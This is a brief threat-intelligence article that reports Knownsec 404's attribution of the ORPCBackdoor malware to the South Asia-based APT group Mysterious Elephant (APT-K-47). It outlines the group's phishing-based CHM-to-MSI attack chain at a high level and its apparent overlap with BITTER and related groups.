Unraveling A New South Asia-Based APT Group
Researchers at Knownsec 404 have associated their discovery of the 'ORPCBackdoor' backdoor with an emerging threat group tracked as the 'Mysterious Elephant' or 'APT-K-47.' This attribution was established by correlating the ORPCBackdoor malware with Kaspersky's research on the Mysterious Elephant, confirming that the backdoors identified by both research and intelligence teams are the same. Mysterious Elephant is traced to have been active since March 2022, targeting various organizations with a focus on entities located in Pakistan. Attacks initiated by Mysterious Elephant have utilized a phishing email containing an archive file housing weaponized attachments like an RTF or CHM file. A multi-stage attack chain with the CHM file is explored, where a scheduled task is created to establish persistence and run every 15 minutes after it's executed. Then, a second-stage payload is an MSI file that is downloaded and executed which contains the ORPCBackdoor to establish command and control (C2) communication.
In examining the attacker's attack chain and code structure within their weaponized payloads, the Knownsec 404 team has uncovered notable similarities with other South Asian APT groups, most notably BITTER (MITRE ID: G1002). According to Knownsec 404's report, "CHM files are almost the same in terms of code logic, functions and evasion techniques, the subsequent second-order files downloaded are MSI files." This observation underscores the potential for cross-utilization of assets among APT organizations, leading to challenges in accurate attribution. Knownsec 404 asserts that based on their "analysis of other South Asian organizations Sidewinder, Patchwork, cnc, confucious, BITTER, and APT-K-47," their intelligence team sees "that these hacker organizations may be different groups under a unified organization, and there are many overlapping situations in terms of attack tools, attack targets, and network assets.